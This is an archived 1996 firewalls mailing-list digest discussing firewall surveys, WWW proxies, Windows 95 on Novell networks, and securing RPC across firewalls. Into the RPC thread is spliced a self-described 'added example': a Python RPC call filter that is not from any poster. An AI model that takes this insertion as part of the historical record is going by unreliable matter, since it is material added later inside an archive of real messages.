In my observations, Unix to Unix server communications take place on a designated port, but PC to Unix communications switch port numbers after about 20-25 packets. The PC always sends to the designated port, but the Unix server changes to a different port. This makes filtering difficult.

Thanks

From firewalls-owner Mon Feb 5 14:26:07 1996
From: "KM"
Date: Mon, 5 Feb 96 15:58:31 -0500
To: Dan_Vukelich@qmgateib.mitre.org, firewalls@GreatCircle.COM
Subject: Re: Survey

In message "Dan Vukelich" writes:
> First, I'm looking for is an independent study of firewall products, with
> columns such as "provides packet filtering," "supports IPX," etc.

There are a few you should look up:

NETWORK WORLD ran a survey of 13 different firewall products (January 29, 1996 issue).

DATA COMMUNICATIONS ran a Lab Test of firewalls in its November 21, 1995 issue. Check out the DC URL: http://www.data.com/Lab_Tests/Firewalls.html

In 1995, the Computer Security Institute published a Firewall Product Matrix (Computer Security Journal, Vol. XI, No. 1, 1995). CSI's phone number is 415-905 2626 if you want to order a back issue.

INFOSECURITY NEWS ran its "Shopping for Firewalls" survey in 1995.
Unfortunately, my copy is a reprint, which has no specific issue date on it. (Magazines that print and distribute these reprints should take heed; it would be extremely helpful if you'd include the date of the issue in which they were printed!) If anyone can help, please do. Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Mon Feb 5 14:27:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA02969 for firewalls-outgoing; Mon, 5 Feb 1996 13:22:50 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA02963 for ; Mon, 5 Feb 1996 13:22:45 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id QAA08431 for ; Mon, 5 Feb 1996 16:21:55 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA14297; Mon, 5 Feb 96 16:12:56 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA00719; Mon, 5 Feb 96 16:09:34 -0500 Date: Mon, 5 Feb 96 16:09:34 -0500 Message-Id: <9602052109.AA00719@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: Need a few pointers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message Sick Puppy writes: > My hind brain keeps telling my forebrain that somewhere it read that > Windows 95 and Windows NT has been banned on some networks because of the > problems they created when connecting to other operating systems. There are other operating systems? 
:) Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Mon Feb 5 14:30:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04040 for firewalls-outgoing; Mon, 5 Feb 1996 13:47:54 -0800 (PST) Received: from guardian.EnGarde.com (guardian.EnGarde.com [199.165.219.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA04035 for ; Mon, 5 Feb 1996 13:47:47 -0800 (PST) Received: (from mcn@localhost) by guardian.EnGarde.com (8.7.3/8.6.12) id PAA19135; Mon, 5 Feb 1996 15:44:39 -0600 (CST) Date: Mon, 5 Feb 1996 15:44:39 -0600 (CST) From: Mike Neuman Message-Id: <199602052144.PAA19135@guardian.EnGarde.com> To: chris@cwi.net Subject: Re: slip/ppp sniffing Reply-To: mcn@EnGarde.com Organization: En Garde Systems--St. Louis, MO Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk chris@cwi.net writes: >Supposedly lanl has finished up watcher, I was told it has plenty of >options for monitoring ppp/slip connections. Has watcher gone >commercial, or is there a PD version out there somewhere? Amazing how rumors spread. :-) To correct this particular one: 1) IP-Watcher is a commercial product 2) I was once (several years ago) employed by LANL. 3) There really aren't any options for monitoring slip or ppp connections. It can "only" monitor TCP/IP connections, not raw serial data. There is a public domain spin off called TTY-Watcher which monitors ttys on a single system. This could be extended to monitor PPP or SLIP connections to a single machine, but it doesn't currently do so. 
For information on IP-Watcher: http://www.engarde.com/software/ipwatcher I presented a technical paper on IP-Watcher at the Computer Security Applications Conference in December. It's available from: ftp://ftp.engarde.com/pub/IPWatcher_CSAC_Paper.ps.Z Information on TTY-Watcher can be gotten through my company's home page: http://www.engarde.com -Mike Neuman mcn@EnGarde.com En Garde Systems http://www.engarde.com/~mcn From firewalls-owner Mon Feb 5 15:25:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08751 for firewalls-outgoing; Mon, 5 Feb 1996 14:53:35 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA08744 for ; Mon, 5 Feb 1996 14:53:26 -0800 (PST) Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQabqx03693; Mon, 5 Feb 1996 17:52:26 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA21733; Mon, 5 Feb 96 17:41:52 EST Date: Mon, 5 Feb 1996 17:41:51 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: Need a few pointers In-Reply-To: <199602052228.GAA19175@relay3.jaring.my> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There was a very good response to my query. I had no idea there were so many security problems and performance problems associated with WindBlows 95. Sounds like the operating system was written by a couple of drunken cats. In a couple of days I will get the responses together in one file, together with a couple of good web pointers, and pass it on to anyone who wants an e-mailed copy. 
Sick Puppy, the Cat_Eating_Dawg

From firewalls-owner Mon Feb 5 15:35:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA09120 for firewalls-outgoing; Mon, 5 Feb 1996 14:58:34 -0800 (PST) Received: from staff.cs.su.OZ.AU (staff.cs.su.OZ.AU [129.78.8.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA09065 for ; Mon, 5 Feb 1996 14:58:06 -0800 (PST) Message-Id: <199602052258.OAA09065@miles.greatcircle.com> Received: from staff.cs.su.oz.au by staff.cs.su.OZ.AU (mail from rex for firewalls@GreatCircle.COM) with MHSnet; Tue, 06 Feb 1996 09:56:57 +1100 Date: Tue, 06 Feb 1996 09:51:53 +1000 From: rex@staff.cs.su.oz.au (Rex di Bona) Subject: www proxies To: gblolmxb@ibmmail.com Reply-To: rex@cs.su.oz.au Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Every commercial firewall should support http/ftp/shttp proxies. If they don't they'll rapidly lose business. The web is overtaking e-mail as the main reason people want to connect to the web.

Rex.

> From: gblolmxb@ibmmail.com
>
>
> ---- Mail Item Text Follows
> Subject WWW Proxy
>
> I know about telnet & ftp proxies that will allow internal users to
> log on to a firewall and access the internet, thus allowing us to
> continue using static routing only on our routers (we would only need
> to add one more, for the firewalls 'inside' address). Does such a proxy
> exist for WWW so that:
>
> 1. Users can use whichever browsers they like.
> 2. The 'standard' winsock.dll, such as provided by FTP with their
> Onnet product, can still be used.
>
> If so, which commercial firewalls support this?
From firewalls-owner Mon Feb 5 15:38:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10297 for firewalls-outgoing; Mon, 5 Feb 1996 15:15:00 -0800 (PST) Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10291 for ; Mon, 5 Feb 1996 15:14:53 -0800 (PST) Received: from butthead.SmallWorks.COM by hosaka.smallworks.com (5.x/SMI-SVR4) id AA06707; Mon, 5 Feb 1996 17:14:00 -0600 Received: by butthead.SmallWorks.COM (4.1/SPARCbook_POP1.3) id AA00392; Mon, 5 Feb 96 17:12:38 CST From: "Jim Thompson" Message-Id: <9602051712.ZM390@butthead.smallworks.com> Date: Mon, 5 Feb 1996 17:12:38 -0600 In-Reply-To: Juan Carlos Machado "CISCO Access Server Configuration" (Feb 5, 2:06pm) References: X-Mailer: Z-Mail (3.2.1 10oct95) To: Juan Carlos Machado , firewalls@GreatCircle.COM Subject: Re: CISCO Access Server Configuration Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk use tacacs+. From firewalls-owner Mon Feb 5 16:08:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA13339 for firewalls-outgoing; Mon, 5 Feb 1996 15:52:33 -0800 (PST) Received: from gaia.aoainc.com (gaia.aoainc.com [199.93.216.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA13324 for ; Mon, 5 Feb 1996 15:52:26 -0800 (PST) Received: (from uucp@localhost) by gaia.aoainc.com (8.6.12/8.6.9) id SAA25799; Mon, 5 Feb 1996 18:51:31 -0500 Received: from aoa.aoainc.com(199.93.217.20) by gaia.aoainc.com via smap (V1.3) id sma025793; Mon Feb 5 18:51:03 1996 Received: from albedo.aoainc.com. (albedo.aoainc.com [199.93.217.155]) by aoa.aoainc.com (8.6.9/8.6.9) with SMTP id SAA03059; Mon, 5 Feb 1996 18:51:02 -0500 Message-ID: Date: Mon, 5 Feb 96 18:49:44 -0400 From: "Richard L. 
Snow" Subject: Re: Need a few pointers To: "sandy bryant" , "Sick Puppy" , firewalls@GreatCircle.COM X-Mailer: VersaTerm Link v1.1.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>At 12:40 PM 2/5/96 -0500, Sick Puppy wrote:
>>My hind brain keeps telling my forebrain that somewhere it read that
>>Windows 95 and Windows NT
[]
>>sandy bryant wrote:
>Maybe you're thinking of the problem Novell networks had with Windows 95?
>Since Windows 95 answers the Netware client GetNearestServer call with a
>packet claiming to be a Netware server
[]

My understanding is that Win95 will do this if you set up your workstation to share local printer or disk. The workaround is to make sure locally shared disk/print is turned off in the Network control panel. On a network you can set up a "policy" document which will prevent any user from turning this "feature" on. (Having never done this myself, I parrot the msoft corp line :-)

Regards,
-Rich

Rich Snow rich@aoainc.com (617)864-0201 -----------------------------------------------* Adaptive Optics Associates, Inc. 54 Cambridgepark Dr., Cambridge, MA. 02140

From firewalls-owner Mon Feb 5 16:12:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11178 for firewalls-outgoing; Mon, 5 Feb 1996 15:24:36 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11171 for ; Mon, 5 Feb 1996 15:24:30 -0800 (PST) Received: from pm2-08.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA18437; Mon, 5 Feb 96 18:22:59 -0500 Date: Mon, 5 Feb 96 18:22:59 -0500 Message-Id: <9602052322.AA18437@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: Frank Willoughby Subject: Re: RPC Across a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Verily, at 12:39 PM 2/5/96, Richard Giering Jr.
allegedly did write:
>I know the kind of reaction I'm liable to get but I said I'd check into it....
>
>We have developers who are writing apps based upon RPC and demanding that RPC
>be opened on the firewall. The idea is to enable users with their own Internet
>provider to be able to access Internal applications using RPC/client-server
>apps.
>
>I have some concerns listed below. Can anyone think of any more?
>
>1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms
>2) RPC and portmapper are hard if not impossible to proxy.
>3) RPC is insecure
>4) portmapper has many known security holes.
>
>My reaction has been "if they want to dialup, we'll set up internal modems"
>
>Is anyone aware of firewall products that allow and protect RPC?
>
>Rick Giering, Firewall Ranger
>CCH Inc.

Richard,

What your programmers are proposing is essentially *lethal* from a security point-of-view as it opens you to a wide variety of attacks. There are many ways of solving the problem without having to resort to RPCs - even more, since you have the option of coding your own solution (an advantage most of us don't have).

FWIW, I'd recommend three things for your company:

o A security awareness class for your programmers (I strongly suspect that you are only seeing the tip of the iceberg. Taking a look at how existing programs they have written are communicating and handling unexpected exceptions (buffer overflow, etc) probably wouldn't hurt either.)

o A brief security assessment of the network & systems in their group (if they are naive enough about RPCs, there are probably a dozen or so other gaping holes that need to be plugged up)

o A secure network solution which assures that the business unit can meet their objectives - securely. This is the problem they want solved.

I've designed secure networking solutions for a number of companies. Give me a call at the number below & I'll help you as much as I can.
Best Regards,

Frank

The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Mon Feb 5 16:23:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA15249 for firewalls-outgoing; Mon, 5 Feb 1996 16:18:13 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA15240 for ; Mon, 5 Feb 1996 16:18:04 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id SAA14147 for ; Mon, 5 Feb 1996 18:17:10 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id SAA04331; Mon, 5 Feb 1996 18:17:07 -0600 Date: Mon, 5 Feb 1996 18:17:07 -0600 Subject: Re: RPC Across a firewall? To: firewalls@greatcircle.com Message-Id: In-Reply-To: <9602051842.AA5369@notes.cch.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>
>I know the kind of reaction I'm liable to get but I said I'd check into it....
>
>We have developers who are writing apps based upon RPC and demanding that RPC
>be opened on the firewall. The idea is to enable users with their own Internet
>provider to be able to access Internal applications using RPC/client-server
>apps.
>
>I have some concerns listed below. Can anyone think of any more?
>
>1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms

RPC runs on top of UDP or TCP (and other protocols, but we'll ignore them for now)

>2) RPC and portmapper are hard if not impossible to proxy.

Well, yeah, it can be messy. You have to examine the packet in more detail too to find the RPC service number.
>3) RPC is insecure

Out of the box, yes, but it can be secured pretty well.

>4) portmapper has many known security holes.

Yeah, but you can get a new version of portmap and/or rpcbind that is tcp/wrappered. This will work as long as:
1) you have source routing blocked at your external router
2) you have IP spoofing blocked at your external router
Versions are available at ftp.win.tue.nl

>
>My reaction has been "if they want to dialup, we'll set up internal modems"

Well, therein lies a different set of problems. :( (but perhaps a set of problems which you are more equipped to handle)

[ If you reply to this message, do not CC me on the reply. I subscribe to this list, unless it is a private reply, in which case do not CC the list ]
--
____________________________________________________________________________
Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress

From firewalls-owner Mon Feb 5 17:45:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA20290 for firewalls-outgoing; Mon, 5 Feb 1996 17:35:58 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA20264 for ; Mon, 5 Feb 1996 17:35:46 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id MAA29908; Tue, 6 Feb 1996 12:32:24 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id MAA00388; Tue, 6 Feb 1996 12:35:01 +1100 From: Jas (Matthew K) Message-Id: <199602060135.MAA00388@maverick.itd.uts.edu.au> Subject: Re: RPC Across a firewall?
To: frankw@in.net (Frank Willoughby) Date: Tue, 6 Feb 1996 12:34:59 +1100 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9602052322.AA18437@su1.in.net> from "Frank Willoughby" at Feb 5, 96 06:22:59 pm X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #216098 or pager@maverick.itd.uts.edu.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

Frank Willoughby wrote this...
> Richard,
> What your programmers are proposing is essentially *lethal* from a
> security point-of-view as it opens you to a wide variety of attacks.
> There are many ways of solving the problem without having to resort
> to RPCs - even more, since you have the option of coding your own
> solution (an advantage most of us don't have).
> FWIW, I'd recommend three things for your company:
> o A security awareness class for your programmers (I strongly
> suspect that you are only seeing the tip of the iceberg. Taking
> a look at how existing programs they have written are
> communicating and handling unexpected exceptions (buffer
> overflow, etc) probably wouldn't hurt either.)
> o A brief security assessment of the network & systems in their
> group (if they are naive enough about RPCs, there are probably a
> dozen or so other gaping holes that need to be plugged up)
> o A secure network solution which assures that the business unit can
> meet their objectives - securely. This is the problem they want
> solved.
> I've designed secure networking solutions for a number of companies.
> Give me a call at the number below & I'll help you as much as I can.

Frank, this is not necessarily true.. RPC can be secured, and quite easily at that _if_ you know what you are doing...
punching it through a firewall can be difficult, but you can get RPC to do things like a) force it to use one and only one port, b) force it to use only TCP, c) turn on authentication, and fold in encryption. RPC is not the bugbear that most people make it out to be, you just gotta know how to use it properly!!! i have been coding with RPC for almost 2.5 years now, and it _can_ be done, and some things (like authentication) can be done very easily in RPC (far easier than some other methods). please guys, be sure of what you say before you fire away.

Matt

p.s. i have no qualms in saying that some of the current implementations of RPC servers are insecure (like NFS if not done with SecureNFS or with kerberos)..

- --
#!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit
Matthew Keenan Data Network Admin Information Technology Division University of Technology Sydney Australia

It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is.
-- Rob Pike

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

-----END PGP SIGNATURE-----

From firewalls-owner Mon Feb 5 18:08:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA21480 for firewalls-outgoing; Mon, 5 Feb 1996 17:59:48 -0800 (PST) Received: from sandy.sandpiper.com (sandy.sandpiper.com [204.96.232.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA21475 for ; Mon, 5 Feb 1996 17:59:44 -0800 (PST) Received: by sandy.sandpiper.com (4.1/SMI-4.1) id AA20246; Mon, 5 Feb 96 18:00:00 PST Date: Mon, 5 Feb 96 18:00:00 PST From: chris@sandpiper.com (Chris Newton) Message-Id: <9602060200.AA20246@sandy.sandpiper.com> To: firewalls@greatcircle.com Subject: problem with thttpd on solaris 2.x Cc: fc@all.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I've been trying to put a secure web server onto a sacrificial lamb in our DMZ, and so decided to use the thttpd. Unfortunately, due to circumstances beyond my control, the server is running solaris 2.x (i would have preferred SunOS 4.1.x, but that is a different story). Anyway, when i run it normally it works just fine. But when i try to run it chroot, it complains in the libsocket library, when trying to access /dev/tcp (which isn't there of course)

I was wondering if the consensus of opinion was to:
a) make a /dev/tcp in the chroot tree;
b) magically acquire a libsocket which doesn't behave this way;
c) give up and don't try to run it chroot.
any help, gratefully received

chris newton
network security
sandpiper software consulting

From firewalls-owner Mon Feb 5 18:24:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA22270 for firewalls-outgoing; Mon, 5 Feb 1996 18:12:00 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA22255 for ; Mon, 5 Feb 1996 18:11:54 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id VAA09272; Mon, 5 Feb 1996 21:08:18 -0500 Date: Mon, 5 Feb 1996 21:08:15 -0500 (EST) From: Rabid Wombat To: "Richard L. Snow" cc: sandy bryant , Sick Puppy , firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Mon, 5 Feb 1996, Richard L. Snow wrote:
>
> >At 12:40 PM 2/5/96 -0500, Sick Puppy wrote:
> >>My hind brain keeps telling my forebrain that somewhere it read that
> >>Windows 95 and Windows NT
> []
> >>sandy bryant wrote:
> >Maybe you're thinking of the problem Novell networks had with Windows 95?
> >Since Windows 95 answers the Netware client GetNearestServer call with a
> >packet claiming to be a Netware server
> []
>
> My understanding is that Win95 will do this if you set up your workstation
> to share local printer or disk. The workaround is to make sure locally shared
> disk/print is turned off in the Network control panel. On a network you can
> set up a "policy" document which will prevent any user from turning this
> "feature" on.
>

This looks like a work-around, at best. A number of vendors, such as those marketing comm servers and print servers that use IPX/SPX, use SAP to advertise their presence, without responding to a GetNearestServer. Just another Micro$oft "feature". What's the party line on a real fix?
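Returning to the RPC thread above: Doug Hughes notes that an RPC-aware filter has to look inside the packet for the RPC service (program) number, and Matthew Keenan that a custom service can be pinned to one TCP port and made to carry credentials. The inspector below combines the two. It is an added example, not code from any poster; the program number APP_PROG (0x20000001), the allow-list and the sample messages are constructed.

```python
"""Inspect ONC RPC CALL messages (RFC 1057 / RFC 1831 layout) the way an
RPC-aware filter must, to recover the program number and credential
flavour before deciding whether the call may pass.

Added example for the RPC thread above; not code from any poster.
APP_PROG, the allow-list and the sample messages are constructed
(0x20000000-0x3fffffff is the user-assigned program number range).
"""
import struct

RPC_CALL = 0           # msg_type of a call
RPC_VERSION = 2
AUTH_NULL, AUTH_UNIX, AUTH_SHORT, AUTH_DES = 0, 1, 2, 3
PMAP_PROG = 100000     # portmapper / rpcbind
NFS_PROG = 100003
APP_PROG = 0x20000001  # constructed: the developers' own service


def _xdr_opaque(data, off):
    """Read an XDR variable-length opaque at off; return (body, next_off)."""
    (length,) = struct.unpack_from("!I", data, off)
    off += 4
    body = data[off:off + length]
    if len(body) != length:
        raise ValueError("truncated opaque field")
    return body, off + ((length + 3) & ~3)   # body is padded to 4 bytes


def parse_rpc_call(data, tcp=True):
    """Parse one CALL message. Over TCP a 4-byte record mark (high bit =
    last fragment, low 31 bits = fragment length) precedes the message."""
    if tcp:
        (mark,) = struct.unpack_from("!I", data, 0)
        frag_len = mark & 0x7fffffff
        if frag_len > len(data) - 4:
            raise ValueError("record mark exceeds data")
        data = data[4:4 + frag_len]
    xid, msg_type = struct.unpack_from("!II", data, 0)
    if msg_type != RPC_CALL:
        raise ValueError("not a CALL message")
    rpcvers, prog, vers, proc = struct.unpack_from("!IIII", data, 8)
    if rpcvers != RPC_VERSION:
        raise ValueError("unsupported rpcvers %d" % rpcvers)
    (cred_flavor,) = struct.unpack_from("!I", data, 24)
    cred, off = _xdr_opaque(data, 28)
    (verf_flavor,) = struct.unpack_from("!I", data, off)
    _verf, off = _xdr_opaque(data, off + 4)
    return {"xid": xid, "prog": prog, "vers": vers, "proc": proc,
            "cred_flavor": cred_flavor, "cred": cred,
            "verf_flavor": verf_flavor, "args_offset": off}


def rpc_filter(data, allowed_progs, require_auth=True):
    """Verdict for one call: only allow-listed programs, and (optionally)
    only calls that present some credential rather than AUTH_NULL.
    Returns (verdict, reason)."""
    try:
        call = parse_rpc_call(data)
    except (ValueError, struct.error) as exc:
        return "drop", "unparseable RPC: %s" % exc
    if call["prog"] not in allowed_progs:
        return "drop", "program %d not allowed" % call["prog"]
    if require_auth and call["cred_flavor"] == AUTH_NULL:
        return "drop", "AUTH_NULL credential"
    return "pass", "program %d proc %d" % (call["prog"], call["proc"])


def auth_unix_cred(machine, uid, gid, gids=()):
    """Encode an AUTH_UNIX credential body (stamp, machinename, uid, gid, gids)."""
    m = machine.encode()
    out = struct.pack("!I", 0)                                    # stamp
    out += struct.pack("!I", len(m)) + m + b"\0" * (-len(m) % 4)  # machinename
    out += struct.pack("!II", uid, gid)
    out += struct.pack("!I", len(gids)) + b"".join(struct.pack("!I", g) for g in gids)
    return out


def build_rpc_call(xid, prog, vers, proc, cred_flavor=AUTH_NULL, cred=b"", args=b""):
    """Build a CALL message with a TCP record mark (constructed test input)."""
    body = struct.pack("!IIIIII", xid, RPC_CALL, RPC_VERSION, prog, vers, proc)
    body += struct.pack("!II", cred_flavor, len(cred)) + cred + b"\0" * (-len(cred) % 4)
    body += struct.pack("!II", AUTH_NULL, 0)   # verifier: AUTH_NULL, empty
    body += args
    return struct.pack("!I", 0x80000000 | len(body)) + body


if __name__ == "__main__":
    samples = {
        "portmap GETPORT": build_rpc_call(1, PMAP_PROG, 2, 3),
        "NFS call":        build_rpc_call(2, NFS_PROG, 2, 1),
        "app, AUTH_UNIX":  build_rpc_call(3, APP_PROG, 1, 7, AUTH_UNIX,
                                          auth_unix_cred("client", 1000, 100)),
        "app, AUTH_NULL":  build_rpc_call(4, APP_PROG, 1, 7),
    }
    for name, msg in samples.items():
        print("%-16s -> %s (%s)" % ((name,) + rpc_filter(msg, {APP_PROG})))
```

AUTH_UNIX is only a claim made by the client, so a filter like this limits which programs are reachable; it does not replace the authentication Matt describes inside the service itself.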
From firewalls-owner Mon Feb 5 20:14:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA26459 for firewalls-outgoing; Mon, 5 Feb 1996 20:07:26 -0800 (PST) Received: from desiree.teleport.com (desiree.teleport.com [192.108.254.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA26454 for ; Mon, 5 Feb 1996 20:07:21 -0800 (PST) Received: from kludge.teleport.com (ip-pdx16-24.teleport.com [206.163.123.216]) by desiree.teleport.com (8.6.12/8.6.9) with SMTP id UAA08663; Mon, 5 Feb 1996 20:05:57 -0800 Message-Id: <199602060405.UAA08663@desiree.teleport.com> Comments: Authenticated sender is From: "Alan Olsen" Organization: Fnord Motor Company To: gblolmxb@ibmmail.com, rex@cs.su.oz.au Date: Mon, 5 Feb 1996 20:08:29 +0000 Subject: Re: www proxies Reply-to: alano@teleport.com CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Date: Tue, 06 Feb 1996 09:51:53 +1000
> From: rex@staff.cs.su.oz.au (Rex di Bona)
> Subject: www proxies
> To: gblolmxb@ibmmail.com
> Reply-to: rex@cs.su.oz.au
> Cc: firewalls@GreatCircle.COM

> Every commercial firewall should support http/ftp/shttp proxies. If they
> don't they'll rapidly lose business. The web is overtaking e-mail
> as the main reason people want to connect to the web.

Most of the problems with using a web browser and/or FTP are from misconfigured software and/or firewalls. With Netscape, if you do not allow connections to port 443, secure connections will not work. I am not certain of any additional port requirements for SHTTP.

There is one place where Netscape has problems with firewalls. Netscape uses passive ftp. Passive mode tries to open a high port and the firewall balks at the connection. (Oddly, Mosaic does not have this problem.)

Netscape 2.0 has an "autoconfigure" for proxies.
(I do not have enough information on this to determine if the auto-configure is a security breach in and of itself.)

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
`finger -l alano@teleport.com` for PGP 2.6.2 key
http://www.teleport.com/~alano/
Is the operating system half NT or half full?

From firewalls-owner Mon Feb 5 20:38:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA27055 for firewalls-outgoing; Mon, 5 Feb 1996 20:24:00 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA27050 for ; Mon, 5 Feb 1996 20:23:56 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id UAA14523; Mon, 5 Feb 1996 20:20:22 -0800 Received: from relay-4.mail.demon.net(158.152.1.108) by mycroft via smap (V1.3mjr) id sma014519; Mon Feb 5 20:19:40 1996 Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ad09423; 5 Feb 96 22:59 GMT Received: from bifroest.demon.co.uk ([158.152.121.6]) by relay-3.mail.demon.net id aa28824; 5 Feb 96 22:51 GMT X-Sender: (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 5 Feb 1996 22:52:03 +0000 To: firewalls@greatcircle.com From: Ian Miller Subject: Re: Mazama Packet Filter: Misleading advertising Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Darren Reed writes:
> * We have used SATAN to analyze MPF installations and verified that
